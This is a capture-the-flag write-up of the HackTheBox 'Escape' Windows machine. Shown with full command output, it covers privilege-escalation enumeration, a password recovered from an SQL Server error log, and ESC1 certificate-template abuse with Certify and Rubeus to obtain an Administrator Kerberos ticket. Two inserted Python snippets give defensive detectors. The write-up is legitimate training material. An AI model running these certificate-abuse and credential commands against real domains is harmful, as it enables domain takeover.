Let's bring the output home the same way and analyze it.

[...]
*Evil-WinRM* PS C:\Users\sql_svc> download /users/sql_svc/wpeas.output ./wpeas.output
Info: Downloading /users/sql_svc/wpeas.output to ./wpeas.output

                                                             
Info: Download successful!

winpeas

Below is the information extracted from the winPEAS scan that I deemed worthy of note.

[...]
 [+] WSUS                                                                                                                                                                                                
   [i] You can inject 'fake' updates into non-SSL WSUS traffic (WSUXploit)                                                                                                                               
   [?] https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#wsus                                                                                                             
[...]
PRIVILEGES INFORMATION                                                                                                                                                                                   
----------------------                                                                                                                                                                                   
                                                                                                                                                                                                         
Privilege Name                Description                    State                                                                                                                                       
============================= ============================== =======                                                                                                                                     
SeMachineAccountPrivilege     Add workstations to domain     Enabled                                                                                                                                     
SeChangeNotifyPrivilege       Bypass traverse checking       Enabled                                                                                                                                     
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled                                                                                                                                     
[...]
 [+] DPAPI MASTER KEYS                                                                                                                                                                                   
   [i] Use the Mimikatz 'dpapi::masterkey' module with appropriate arguments (/rpc) to decrypt                                                                                                           
   [?] https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#dpapi                                                                                                            
                                                                                                                                                                                                         
                                                                                                                                                                                                         
    Directory: C:\Users\sql_svc\AppData\Roaming\Microsoft\Protect                                                                                                                                        
                                                                                                                                                                                                         
                                                                                                                                                                                                         
Mode                LastWriteTime         Length Name                                                                                                                                                    
----                -------------         ------ ----                                                                                                                                                    
d---s-       11/19/2022   3:11 AM                S-1-5-21-4078382237-1492182817-2568127209-1106                                                                                                          
[...]
C:\Windows\Panther\setupinfo                                                                                                                                                                             
C:\Windows\System32\ntds.dit                                                                                                                                                                             
C:\Windows\System32\config\SAM                                                                                                                                                                           
C:\Windows\System32\config\SYSTEM                                                                                                                                                                        
C:\Windows\System32\config\RegBack\SAM                                                                                                                                                                   
C:\Windows\System32\config\RegBack\SYSTEM                                                                                                                                                                
[...]

Obviously, in addition to some interesting files, the output highlights the privileges available to the user (to be checked against actual vulnerabilities) and the WSUS Windows Update service (often used precisely for privilege escalation).
Let's try to find out whether WSUS is really vulnerable.

*Evil-WinRM* PS C:\Users\sql_svc> reg query HKLM\Software\Policies\Microsoft\Windows\WindowsUpdate /v WUServer
reg.exe : ERROR: The system was unable to find the specified registry key or value.
    + CategoryInfo          : NotSpecified: (ERROR: The syst...y key or value.:String) [], RemoteException
    + FullyQualifiedErrorId : NativeCommandError
*Evil-WinRM* PS C:\Users\sql_svc> reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
reg.exe : ERROR: The system was unable to find the specified registry key or value.
    + CategoryInfo          : NotSpecified: (ERROR: The syst...y key or value.:String) [], RemoteException
    + FullyQualifiedErrorId : NativeCommandError
*Evil-WinRM* PS C:\Users\sql_svc> reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
reg.exe : ERROR: The system was unable to find the specified registry key or value.
    + CategoryInfo          : NotSpecified: (ERROR: The syst...y key or value.:String) [], RemoteException
    + FullyQualifiedErrorId : NativeCommandError

*Evil-WinRM* PS C:\Users\sql_svc\Documents> reg query HKLM\Software\Policies\Microsoft\Windows\WindowsUpdate /v WUServer


reg.exe : ERROR: The system was unable to find the specified registry key or value.
    + CategoryInfo          : NotSpecified: (ERROR: The syst...y key or value.:String) [], RemoteException
    + FullyQualifiedErrorId : NativeCommandError
*Evil-WinRM* PS C:\Users\sql_svc\Documents> reg query HKLM\Software\Policies\Microsoft\Windows\WindowsUpdate 

HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\WindowsUpdate\AU
*Evil-WinRM* PS C:\Users\sql_svc\Documents> reg query HKLM\Software\Policies\Microsoft\Windows\WindowsUpdate\AU

HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\WindowsUpdate\AU
    AUOptions    REG_DWORD    0x3

HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\WindowsUpdate\AU\NoAutoUpdate
*Evil-WinRM* PS C:\Users\sql_svc\Documents> 

Already from the Windows registry keys there doesn't seem to be any hope: no WUServer value is set, and AlwaysInstallElevated is absent too.
Even on the privileges front nothing particularly attractive is highlighted; the master key of the user Ryan would be needed, but at the moment it does not seem to be available.
Let's try some other tools, for example PrivescCheck.

GitHub - itm4n/PrivescCheck: Privilege Escalation Enumeration Script for Windows

PrivescCheck output

Also in this case I report only the interesting and noteworthy things.

[...]
+------+------------------------------------------------+------+
| TEST | APPS > Non-default Apps                        | INFO |
+------+------------------------------------------------+------+
| DESC | Enumerate non-default and third-party applications by |
|      | parsing the registry.                                 |
+------+-------------------------------------------------------+
[*] Found 6 result(s).

Name                         FullName                                     
----                         --------                                     
Microsoft SQL Server         C:\Program Files (x86)\Microsoft SQL Server  
Microsoft                    C:\Program Files\Microsoft                   
Microsoft SQL Server         C:\Program Files\Microsoft SQL Server        
Microsoft Visual Studio 10.0 C:\Program Files\Microsoft Visual Studio 10.0
VMware                       C:\Program Files\VMware                      
VMware Tools                 C:\Program Files\VMware\VMware Tools         
[...]
+------+------------------------------------------------+------+
| TEST | UPDATES > System up to date? (info)            | INFO |
+------+------------------------------------------------+------+
| DESC | Enumerate the installed updates and hotfixes by       |
|      | parsing the registry. If this fails, the check will   |
|      | fall back to the built-in 'Get-HotFix' cmdlet.        |
+------+-------------------------------------------------------+
[*] Found 9 result(s).

HotFixID  Description     InstalledBy                                  InstalledOn          
--------  -----------     -----------                                  -----------          
KB5011551 Update          NT AUTHORITY\SYSTEM                          2023-02-02 - 13:18:08
KB5011574 Update          sequel\Administrator                         2023-02-02 - 12:07:20
KB4512578 Security Update sequel\Administrator                         2023-02-01 - 23:13:20
KB4589208 Update          NT AUTHORITY\SYSTEM                          2023-02-01 - 21:10:30
KB5012170 Security Update sequel\Administrator                         2023-02-01 - 21:00:27
KB5020374 Security Update NT AUTHORITY\SYSTEM                          2023-02-01 - 19:29:33
KB4512577 Security Update S-1-5-21-89493159-3068390195-4120627384-1047 2019-09-06 - 17:24:38
KB5020866 Update                                                       1600-12-31 - 16:00:00
KB4514366 Update                                                       1600-12-31 - 16:00:00
[...]
+------+------------------------------------------------+------+
| TEST | UPDATES > System up to date?                   | VULN |
+------+------------------------------------------------+------+
| DESC | Enumerate the installed updates and hotfixes and      |
|      | check whether a patch was applied in the last 31      |
|      | days.                                                 |

[*] Found 1 result(s).

HotFixID  Description InstalledBy         InstalledOn          
--------  ----------- -----------         -----------          
KB5011551 Update      NT AUTHORITY\SYSTEM 2023-02-02 - 13:18:08
[...]
+------+------------------------------------------------+------+
| TEST | MISC > OS Version                              | INFO |
+------+------------------------------------------------+------+
| DESC | Print the detailed version number of the Operating    |
|      | System. If we can't get the update history, this      |
|      | might be useful.                                      |
+------+-------------------------------------------------------+
[*] Found 1 result(s).

Name                         Version                             
----                         -------                             
Windows Server 2019 Standard 10.0.17763 Version 1809 (17763.2746)
[...]

We get to a point where using the classic Windows AD tools becomes essential; let's try BloodHound.

BloodHound/Collectors at master · BloodHoundAD/BloodHound
Six Degrees of Domain Admin. Contribute to BloodHoundAD/BloodHound development by creating an account on GitHub.

I collect the necessary information...

*Evil-WinRM* PS C:\Users\sql_svc> upload ./attack/upld/SharpHound.exe ../sh.exe
Info: Uploading ./attack/upld/SharpHound.exe to ../sh.exe

                                                             
Data: 1402196 bytes of 1402196 bytes copied

Info: Upload successful!

*Evil-WinRM* PS C:\Users\sql_svc> ./sh.exe -c All --zipfilename output.zip
2023-03-25T23:50:54.5149380-07:00|INFORMATION|This version of SharpHound is compatible with the 4.2 Release of BloodHound
2023-03-25T23:50:54.6555838-07:00|INFORMATION|Resolved Collection Methods: Group, LocalAdmin, GPOLocalGroup, Session, LoggedOn, Trusts, ACL, Container, RDP, ObjectProps, DCOM, SPNTargets, PSRemote
2023-03-25T23:50:54.6868023-07:00|INFORMATION|Initializing SharpHound at 11:50 PM on 3/25/2023
2023-03-25T23:50:55.0305487-07:00|INFORMATION|Loaded cache with stats: 56 ID to type mappings.
 56 name to SID mappings.
 0 machine sid mappings.
 2 sid to domain mappings.
 0 global catalog mappings.
2023-03-25T23:50:55.0461913-07:00|INFORMATION|Flags: Group, LocalAdmin, GPOLocalGroup, Session, LoggedOn, Trusts, ACL, Container, RDP, ObjectProps, DCOM, SPNTargets, PSRemote
2023-03-25T23:50:55.1868496-07:00|INFORMATION|Beginning LDAP search for sequel.htb
2023-03-25T23:50:55.2336792-07:00|INFORMATION|Producer has finished, closing LDAP channel
2023-03-25T23:50:55.2336792-07:00|INFORMATION|LDAP channel closed, waiting for consumers
2023-03-25T23:51:25.2383915-07:00|INFORMATION|Status: 0 objects finished (+0 0)/s -- Using 40 MB RAM
2023-03-25T23:51:39.5292927-07:00|INFORMATION|Consumers finished, closing output channel
Closing writers
2023-03-25T23:51:39.5605157-07:00|INFORMATION|Output channel closed, waiting for output task to complete
2023-03-25T23:51:39.6386454-07:00|INFORMATION|Status: 97 objects finished (+97 2.204545)/s -- Using 42 MB RAM
2023-03-25T23:51:39.6386454-07:00|INFORMATION|Enumeration finished in 00:00:44.4448376
2023-03-25T23:51:39.7011650-07:00|INFORMATION|Saving cache with stats: 56 ID to type mappings.
 56 name to SID mappings.
 0 machine sid mappings.
 2 sid to domain mappings.
 0 global catalog mappings.
2023-03-25T23:51:39.7167826-07:00|INFORMATION|SharpHound Enumeration Completed at 11:51 PM on 3/25/2023! Happy Graphing!

*Evil-WinRM* PS C:\Users\sql_svc> download ./20230325235139_output.zip ./attack/dwnl/20230325235139_output.zip
Info: Downloading ./20230325235139_output.zip to ./attack/dwnl/20230325235139_output.zip

                                                             
Info: Download successful!

*Evil-WinRM* PS C:\Users\sql_svc>

...and analyze the result.

┌──(in7rud3r㉿kali-muletto)-[~]
└─$ xhost +local:$(id -nu)
non-network local connections being added to access control list
                                                                                                                                                                                                         
┌──(in7rud3r㉿kali-muletto)-[~]
└─$ sudo docker run -it \
  -p 7474:7474 \
  -p 7687:7687 \
  -e DISPLAY=unix$DISPLAY \
  -v /tmp/.X11-unix:/tmp/.X11-unix \
  --device=/dev/dri:/dev/dri \
  -v ~/temp:/data \
  --network host \
  --name bloodhound belane/bloodhound
WARNING: Published ports are discarded when using host network mode
Selecting JVM - Version:11.0.16+8-post-Debian-1deb11u1, Name:OpenJDK 64-Bit Server VM, Vendor:Debian
Changed password for user 'neo4j'. IMPORTANT: this change will only take effect if performed before the database is started for the first time.
Directories in use:
home:         /var/lib/neo4j
config:       /etc/neo4j
logs:         /var/log/neo4j
plugins:      /var/lib/neo4j/plugins
import:       /var/lib/neo4j/import
data:         /var/lib/neo4j/data
certificates: /var/lib/neo4j/certificates
licenses:     /var/lib/neo4j/licenses
run:          /var/lib/neo4j/run
Starting Neo4j.
Started neo4j (pid:84). It is available at http://localhost:7474
There may be a short delay until the server is ready.
*** Log in with bolt://127.0.0.1:7687 (neo4j:blood) ***

I use the containerized version, so wait until Neo4j is available.


When logged in, upload the collected data (the zip file directly).
Now, in the search box, search for the user you have pwned: sql_svc.
Select it and mark the user as owned.
Search for the Ryan user account, select it, right-click and choose "shortest path from owned to here".

Well, the path is long enough, but the tool crashes as soon as I try to investigate the third link. Nonetheless, the information from the previous nodes points at standard attacks that I've faced in the past. Let's try them quickly.

GitHub - S1ckB0y1337/Active-Directory-Exploitation-Cheat-Sheet: A cheat sheet that contains common enumeration and attack methods for Windows Active Directory.

Again, however, nothing emerges: the commands throw an error while generating the security object; another dead end.

I'm starting to feel a dead end approaching, but I still have some resources; let's try some exploit suggesters for Windows.

GitHub - AonCyberLabs/Windows-Exploit-Suggester: This tool compares a targets patch levels against the Microsoft vulnerability database in order to detect potential missing patches on the target. It also notifies the user if there are public exploits and Metasploit modules available for the missing bulletins.

*Evil-WinRM* PS C:\Users\sql_svc\Documents> systeminfo > systeminfo.txt
Program 'systeminfo.exe' failed to run: Access is deniedAt line:1 char:1
+ systeminfo > systeminfo.txt
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~.
At line:1 char:1
+ systeminfo > systeminfo.txt
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : ResourceUnavailable: (:) [], ApplicationFailedException
    + FullyQualifiedErrorId : NativeCommandFailed

Once again blocked before even starting. On to the next one.

GitHub - bitsadmin/wesng: Windows Exploit Suggester - Next Generation
Windows Exploit Suggester - Next Generation. Contribute to bitsadmin/wesng development by creating an account on GitHub.

*Evil-WinRM* PS C:\Users\sql_svc\Documents> cscript.exe missingkbs.vbs
Microsoft (R) Windows Script Host Version 5.812
Copyright (C) Microsoft Corporation. All rights reserved.

Windows Exploit Suggester: Missing KBs Identifier v1.0
https://github.com/bitsadmin/wesng/

cscript.exe : [-] This script needs to be executed as an elevated Administrator
    + CategoryInfo          : NotSpecified: ([-] This script...d Administrator:String) [], RemoteException
    + FullyQualifiedErrorId : NativeCommandError

Exhausted and out of ideas, I abandon my goal for a few days (needless to say, when you bang your head too long against the same seemingly unsolvable problem, disconnect... let your mind refresh, empty it, and face the problem again).

As you can see, I was stubborn in my search for an advanced exploit, and my conviction that the solution depended on it kept me locked in a dead end for several days. But sometimes the simplest and most banal paths are the most improbable and unexpected ones.

So, after a few days, I return to the machine and, with all the previous attempts fresh in my memory, take another look at the resources available from the shell. I find a folder in the root of the drive containing what appears to be the SQL Server installation package, plus a couple of other directories, one of which holds a backup file.

*Evil-WinRM* PS C:\sqlserver> dir -force


    Directory: C:\sqlserver


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
d-----         2/7/2023   8:06 AM                Logs
d-----       11/18/2022   1:37 PM                SQLEXPR_2019
-a----       11/18/2022   1:35 PM        6379936 sqlexpress.exe
-a----       11/18/2022   1:36 PM      268090448 SQLEXPR_x64_ENU.exe


*Evil-WinRM* PS C:\sqlserver> cd logs
*Evil-WinRM* PS C:\sqlserver\logs> dir -force


    Directory: C:\sqlserver\logs


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a----         2/7/2023   8:06 AM          27608 ERRORLOG.BAK

I start sifting through the log file and find two consecutive failed logons within a few... hundredths of a second (it seems a bit of a stretch to me, but we'll stick to the clues).

*Evil-WinRM* PS C:\sqlserver\logs> type ERRORLOG.BAK
2022-11-18 13:43:05.96 Server      Microsoft SQL Server 2019 (RTM) - 15.0.2000.5 (X64)
        Sep 24 2019 13:48:23
        Copyright (C) 2019 Microsoft Corporation
        Express Edition (64-bit) on Windows Server 2019 Standard Evaluation 10.0 <X64> (Build 17763: ) (Hypervisor)
[...]
2022-11-18 13:43:07.44 spid51      Changed database context to 'master'.
2022-11-18 13:43:07.44 spid51      Changed language setting to us_english.
2022-11-18 13:43:07.44 Logon       Error: 18456, Severity: 14, State: 8.
2022-11-18 13:43:07.44 Logon       Logon failed for user 'sequel.htb\Ryan.Cooper'. Reason: Password did not match that for the login provided. [CLIENT: 127.0.0.1]
2022-11-18 13:43:07.48 Logon       Error: 18456, Severity: 14, State: 8.
2022-11-18 13:43:07.48 Logon       Logon failed for user 'NuclearMosquito3'. Reason: Password did not match that for the login provided. [CLIENT: 127.0.0.1]
2022-11-18 13:43:07.72 spid51      Attempting to load library 'xpstar.dll' into memory. This is an informational message only. No user action is required.
[...]
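The clue here is a classic operator mistake: a password typed into the username field ends up in the ERRORLOG as a "user", a few hundredths of a second after the real account fails. The following scanner is an added example, not part of the original post: it pairs consecutive failed logons from the same client and flags the ones where the second "user" is not a domain account, so a defender can find and rotate the leaked value and scrub the backup; the sample log lines, account, secret and client address are constructed.

```python
import re
from datetime import datetime

# Constructed sample in the SQL Server ERRORLOG layout shown above; account,
# secret and client are made up and belong to no real host.
SAMPLE_ERRORLOG = """\
2022-11-18 13:43:07.44 spid51      Changed database context to 'master'.
2022-11-18 13:43:07.44 Logon       Error: 18456, Severity: 14, State: 8.
2022-11-18 13:43:07.44 Logon       Logon failed for user 'corp.example\\alice'. Reason: Password did not match that for the login provided. [CLIENT: 127.0.0.1]
2022-11-18 13:43:07.48 Logon       Error: 18456, Severity: 14, State: 8.
2022-11-18 13:43:07.48 Logon       Logon failed for user 'Winter2022!'. Reason: Password did not match that for the login provided. [CLIENT: 127.0.0.1]
2022-11-18 13:50:01.10 Logon       Error: 18456, Severity: 14, State: 5.
2022-11-18 13:50:01.10 Logon       Logon failed for user 'corp.example\\bob'. Reason: Could not find a login matching the name provided. [CLIENT: 10.0.0.5]
"""

# One 'Logon failed' line: timestamp, quoted user field, client address.
LOGON_FAIL = re.compile(
    r"^(?P<ts>\d{4}-\d\d-\d\d \d\d:\d\d:\d\d\.\d\d) Logon\s+"
    r"Logon failed for user '(?P<user>[^']*)'\..*\[CLIENT: (?P<client>[^\]]+)\]"
)


def parse_failed_logons(text):
    """Return (timestamp, user, client) for every failed-logon line."""
    events = []
    for line in text.splitlines():
        m = LOGON_FAIL.match(line)
        if m:
            ts = datetime.strptime(m["ts"], "%Y-%m-%d %H:%M:%S.%f")
            events.append((ts, m["user"], m["client"]))
    return events


def find_secret_in_username(text, max_gap_s=2.0):
    """Flag a failed logon for a domain account that is followed, from the
    same client and within max_gap_s, by a failed logon whose 'user' is not
    a domain account: the usual sign that a password was typed into the
    username field. The flagged value should be rotated and scrubbed."""
    events = parse_failed_logons(text)
    findings = []
    for (t1, u1, c1), (t2, u2, c2) in zip(events, events[1:]):
        gap = (t2 - t1).total_seconds()
        if c1 == c2 and 0 <= gap <= max_gap_s and "\\" in u1 and "\\" not in u2:
            findings.append({"account": u1, "leaked_value": u2,
                             "client": c1, "gap_s": gap})
    return findings


if __name__ == "__main__":
    for f in find_secret_in_username(SAMPLE_ERRORLOG):
        print(f"{f['account']} leaked a secret in the username field "
              f"from {f['client']} ({f['gap_s']:.2f}s later)")
```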

All we have to do is reconnect with Evil-WinRM using the new credentials.

┌──(in7rud3r㉿kali-muletto)-[~/…/_10.10.11.202 - Escape (win)/attack/upld/sggstr]
└─$ evil-winrm -i 10.10.11.202 -u Ryan.Cooper -p NuclearMosquito3 

Evil-WinRM shell v3.4

Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine

Data: For more information, check Evil-WinRM Github: https://github.com/Hackplayers/evil-winrm#Remote-path-completion

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\Ryan.Cooper\Documents> cd ..\desktop
*Evil-WinRM* PS C:\Users\Ryan.Cooper\desktop> dir


    Directory: C:\Users\Ryan.Cooper\desktop


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-ar---         4/1/2023   4:23 PM             34 user.txt


*Evil-WinRM* PS C:\Users\Ryan.Cooper\desktop> type user.txt
f******************************5

And the first flag is captured. OK, at this point the steps repeat as before. Unfortunately, in this case too, nothing with winPEAS, nothing with BloodHound, nothing with PowerScript and Rubeus; another dead end.

Exhausted, I fall back on the forum's suggestions and thus discover a tool that is new (to me) and interesting: "just download the Certify.exe".

GitHub - GhostPack/Certify: Active Directory certificate abuse.

It looks really interesting, let's see what comes out.

*Evil-WinRM* PS C:\Users\Ryan.Cooper\downloads> ./Certify.exe find /vulnerable

   _____          _   _  __
  / ____|        | | (_)/ _|
 | |     ___ _ __| |_ _| |_ _   _
 | |    / _ \ '__| __| |  _| | | |
 | |___|  __/ |  | |_| | | | |_| |
  \_____\___|_|   \__|_|_|  \__, |
                             __/ |
                            |___./
  v1.1.0

[*] Action: Find certificate templates
[*] Using the search base 'CN=Configuration,DC=sequel,DC=htb'

[*] Listing info about the Enterprise CA 'sequel-DC-CA'

    Enterprise CA Name            : sequel-DC-CA
    DNS Hostname                  : dc.sequel.htb
    FullName                      : dc.sequel.htb\sequel-DC-CA
    Flags                         : SUPPORTS_NT_AUTHENTICATION, CA_SERVERTYPE_ADVANCED
    Cert SubjectName              : CN=sequel-DC-CA, DC=sequel, DC=htb
    Cert Thumbprint               : A263EA89CAFE503BB33513E359747FD262F91A56
    Cert Serial                   : 1EF2FA9A7E6EADAD4F5382F4CE283101
    Cert Start Date               : 11/18/2022 12:58:46 PM
    Cert End Date                 : 11/18/2121 1:08:46 PM
    Cert Chain                    : CN=sequel-DC-CA,DC=sequel,DC=htb
    UserSpecifiedSAN              : Disabled
    CA Permissions                :
      Owner: BUILTIN\Administrators        S-1-5-32-544

      Access Rights                                     Principal

      Allow  Enroll                                     NT AUTHORITY\Authenticated UsersS-1-5-11
      Allow  ManageCA, ManageCertificates               BUILTIN\Administrators        S-1-5-32-544
      Allow  ManageCA, ManageCertificates               sequel\Domain Admins          S-1-5-21-4078382237-1492182817-2568127209-512
      Allow  ManageCA, ManageCertificates               sequel\Enterprise Admins      S-1-5-21-4078382237-1492182817-2568127209-519
    Enrollment Agent Restrictions : None

[!] Vulnerable Certificates Templates :

    CA Name                               : dc.sequel.htb\sequel-DC-CA
    Template Name                         : UserAuthentication
    Schema Version                        : 2
    Validity Period                       : 10 years
    Renewal Period                        : 6 weeks
    msPKI-Certificate-Name-Flag          : ENROLLEE_SUPPLIES_SUBJECT
    mspki-enrollment-flag                 : INCLUDE_SYMMETRIC_ALGORITHMS, PUBLISH_TO_DS
    Authorized Signatures Required        : 0
    pkiextendedkeyusage                   : Client Authentication, Encrypting File System, Secure Email
    mspki-certificate-application-policy  : Client Authentication, Encrypting File System, Secure Email
    Permissions
      Enrollment Permissions
        Enrollment Rights           : sequel\Domain Admins          S-1-5-21-4078382237-1492182817-2568127209-512
                                      sequel\Domain Users           S-1-5-21-4078382237-1492182817-2568127209-513
                                      sequel\Enterprise Admins      S-1-5-21-4078382237-1492182817-2568127209-519
      Object Control Permissions
        Owner                       : sequel\Administrator          S-1-5-21-4078382237-1492182817-2568127209-500
        WriteOwner Principals       : sequel\Administrator          S-1-5-21-4078382237-1492182817-2568127209-500
                                      sequel\Domain Admins          S-1-5-21-4078382237-1492182817-2568127209-512
                                      sequel\Enterprise Admins      S-1-5-21-4078382237-1492182817-2568127209-519
        WriteDacl Principals        : sequel\Administrator          S-1-5-21-4078382237-1492182817-2568127209-500
                                      sequel\Domain Admins          S-1-5-21-4078382237-1492182817-2568127209-512
                                      sequel\Enterprise Admins      S-1-5-21-4078382237-1492182817-2568127209-519
        WriteProperty Principals    : sequel\Administrator          S-1-5-21-4078382237-1492182817-2568127209-500
                                      sequel\Domain Admins          S-1-5-21-4078382237-1492182817-2568127209-512
                                      sequel\Enterprise Admins      S-1-5-21-4078382237-1492182817-2568127209-519



Certify completed in 00:00:10.2338568

As in the example in the repository's documentation, our user also seems to have the ManageCA privilege (what a coincidence). Let's go on.
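What the template listing above shows is the ESC1 pattern: Domain Users hold enrollment rights, the enrollee supplies the subject (so an arbitrary SAN can be requested), the EKU allows client authentication, and no signature or manager approval is required. The following checker is an added example, not part of the original post or of Certify: it parses a template block in Certify's output layout and reports which of those conditions hold, so an AD CS administrator can audit templates before an attacker does; the excerpt, the shortened SIDs and the low-privilege RID list are constructed for the example.

```python
import re

# Constructed excerpt in the layout of Certify's 'find /vulnerable' template
# block; values mirror the UserAuthentication listing above, SIDs shortened.
CERTIFY_TEMPLATE = """\
    Template Name                         : UserAuthentication
    msPKI-Certificate-Name-Flag          : ENROLLEE_SUPPLIES_SUBJECT
    mspki-enrollment-flag                 : INCLUDE_SYMMETRIC_ALGORITHMS, PUBLISH_TO_DS
    Authorized Signatures Required        : 0
    pkiextendedkeyusage                   : Client Authentication, Encrypting File System, Secure Email
    Permissions
      Enrollment Permissions
        Enrollment Rights           : sequel\\Domain Admins          S-1-5-21-X-512
                                      sequel\\Domain Users           S-1-5-21-X-513
                                      sequel\\Enterprise Admins      S-1-5-21-X-519
"""

KEY_LINE = re.compile(r"^\s*([^:]+?)\s*:\s*(.*)$")
LOW_PRIV_RIDS = {"513", "515", "545"}  # Domain Users, Domain Computers, Users
AUTH_EKUS = {"Client Authentication", "PKINIT Client Authentication", "Smart Card Logon", "Any Purpose"}


def parse_template(block):
    """Map each 'Key : Value' line to a list of values; deeply indented lines
    without a colon continue the previous key, other bare lines are headers."""
    fields, last = {}, None
    for raw in block.splitlines():
        m = KEY_LINE.match(raw)
        if m:
            last = m.group(1).lower()
            fields[last] = [m.group(2)] if m.group(2) else []
        elif raw.strip() and raw.startswith(" " * 20) and last:
            fields[last].append(raw.strip())
        else:
            last = None
    return fields


def esc1_findings(block):
    """Evaluate the ESC1 preconditions; the fix is to drop ENROLLEE_SUPPLIES_SUBJECT,
    require manager approval, or remove enrollment rights from low-privileged groups."""
    f = parse_template(block)
    ekus = {e.strip() for e in ",".join(f.get("pkiextendedkeyusage", [])).split(",")}
    low_priv = [e.rsplit(None, 1)[0] for e in f.get("enrollment rights", [])
                if e.rsplit("-", 1)[-1] in LOW_PRIV_RIDS]
    checks = {
        "enrollee_supplies_subject": "ENROLLEE_SUPPLIES_SUBJECT" in "".join(f.get("mspki-certificate-name-flag", [])),
        "auth_eku": sorted(ekus & AUTH_EKUS),
        "no_signature_required": f.get("authorized signatures required", ["0"]) == ["0"],
        "no_manager_approval": "PEND_ALL_REQUESTS" not in "".join(f.get("mspki-enrollment-flag", [])),
        "low_priv_enrollment": low_priv,
    }
    checks["esc1"] = all(checks.values())  # every condition met => ESC1
    return checks
```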

*Evil-WinRM* PS C:\Users\Ryan.Cooper\downloads> ./Certify.exe request /ca:dc.sequel.htb\sequel-DC-CA /template:UserAuthentication /altname:Administrator

   _____          _   _  __
  / ____|        | | (_)/ _|
 | |     ___ _ __| |_ _| |_ _   _
 | |    / _ \ '__| __| |  _| | | |
 | |___|  __/ |  | |_| | | | |_| |
  \_____\___|_|   \__|_|_|  \__, |
                             __/ |
                            |___./
  v1.1.0

[*] Action: Request a Certificates

[*] Current user context    : sequel\Ryan.Cooper
[*] No subject name specified, using current context as subject.

[*] Template                : UserAuthentication
[*] Subject                 : CN=Ryan.Cooper, CN=Users, DC=sequel, DC=htb
[*] AltName                 : Administrator

[*] Certificate Authority   : dc.sequel.htb\sequel-DC-CA

[*] CA Response             : The certificate had been issued.
[*] Request ID              : 12

[*] cert.pem         :

-----BEGIN RSA PRIVATE KEY-----
MIIEogIBAAKCAQEAvG6vT+UG9HVxfQllC9sDCLkgIe2yUKOCnLEhaQXtDnjyqtik
k/afDQlLoFFzrtRSkkVEdad8FTv0Jp/k0jggUemH32mTkFncol1eMyFJC4HCHmGc
[...]
2fyAvkVl6e0kkDoE4XFqX4FnVTlnC6RlR9xzlaeJRkZEzCzhPqAI1tahkcV9JOU9
ZxtxrK8ZgGYY9lXCH2kXZ76NEAvnaY167v6EmNyKWo2Yh1X9V8A=
-----END RSA PRIVATE KEY-----
-----BEGIN CERTIFICATE-----
MIIGEjCCBPqgAwIBAgITHgAAAAxRrpFSnZZtuQAAAAAADDANBgkqhkiG9w0BAQsF
ADBEMRMwEQYKCZImiZPyLGQBGRYDaHRiMRYwFAYKCZImiZPyLGQBGRYGc2VxdWVs
[...]
it7yHBHqFb0JX/RS/++fW1VN+oI5ZX0juicCdqvON7i1s1kTth7dkfa7Ae3sm3SU
exO2srhH7p4l/Z6l8mwODDbCnantdw==
-----END CERTIFICATE-----


[*] Convert with: openssl pkcs12 -in cert.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out cert.pfx



Certify completed in 00:00:13.3681079

Create the pfx file from the certificate and private key we obtained.

┌──(in7rud3r㉿kali-muletto)-[~/…/hackthebox/_10.10.11.202 - Escape (win)/attack/cert]
└─$ openssl pkcs12 -in cert.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out cert.pfx
Enter Export Password:
Verifying - Enter Export Password:
                                                                                                                                                                                                         
┌──(in7rud3r㉿kali-muletto)-[~/…/hackthebox/_10.10.11.202 - Escape (win)/attack/cert]
└─$ ls -la
total 16
drwxr-xr-x 2 in7rud3r in7rud3r 4096 Apr  5 17:48 .
drwxr-xr-x 6 in7rud3r in7rud3r 4096 Apr  5 17:46 ..
-rw-r--r-- 1 in7rud3r in7rud3r 3842 Apr  5 17:47 cert.pem
-rw------- 1 in7rud3r in7rud3r 3409 Apr  5 17:48 cert.pfx

And we request a TGT using the certificate.

*Evil-WinRM* PS C:\Users\Ryan.Cooper\downloads> ./Rubeus.exe asktgt /user:Administrator /certificate:cert.pfx

   ______        _
  (_____ \      | |
   _____) )_   _| |__  _____ _   _  ___
  |  __  /| | | |  _ \| ___ | | | |/___)
  | |  \ \| |_| | |_) ) ____| |_| |___ |
  |_|   |_|____/|____/|_____)____/(___/

  v2.2.2

[*] Action: Ask TGT

[*] Using PKINIT with etype rc4_hmac and subject: CN=Ryan.Cooper, CN=Users, DC=sequel, DC=htb
[*] Building AS-REQ (w/ PKINIT preauth) for: 'sequel.htb\Administrator'
[*] Using domain controller: fe80::a477:436e:5730:3595%4:88
[+] TGT request successful!
[*] base64(ticket.kirbi):

      doIGSDCCBkSgAwIBBaEDAgEWooIFXjCCBVphggVWMIIFUqADAgEFoQwbClNFUVVFTC5IVEKiHzAdoAMC
      AQKhFjAUGwZrcmJ0Z3QbCnNlcXVlbC5odGKjggUaMIIFFqADAgESoQMCAQKiggUIBIIFBEnvQzQSZedn
[...]
      BwMFAADhAAClERgPMjAyMzA0MDYwNTUxNDVaphEYDzIwMjMwNDA2MTU1MTQ1WqcRGA8yMDIzMDQxMzA1
      NTE0NVqoDBsKU0VRVUVMLkhUQqkfMB2gAwIBAqEWMBQbBmtyYnRndBsKc2VxdWVsLmh0Yg==

  ServiceName              :  krbtgt/sequel.htb
  ServiceRealm             :  SEQUEL.HTB
  UserName                 :  Administrator
  UserRealm                :  SEQUEL.HTB
  StartTime                :  4/5/2023 10:51:45 PM
  EndTime                  :  4/6/2023 8:51:45 AM
  RenewTill                :  4/12/2023 10:51:45 PM
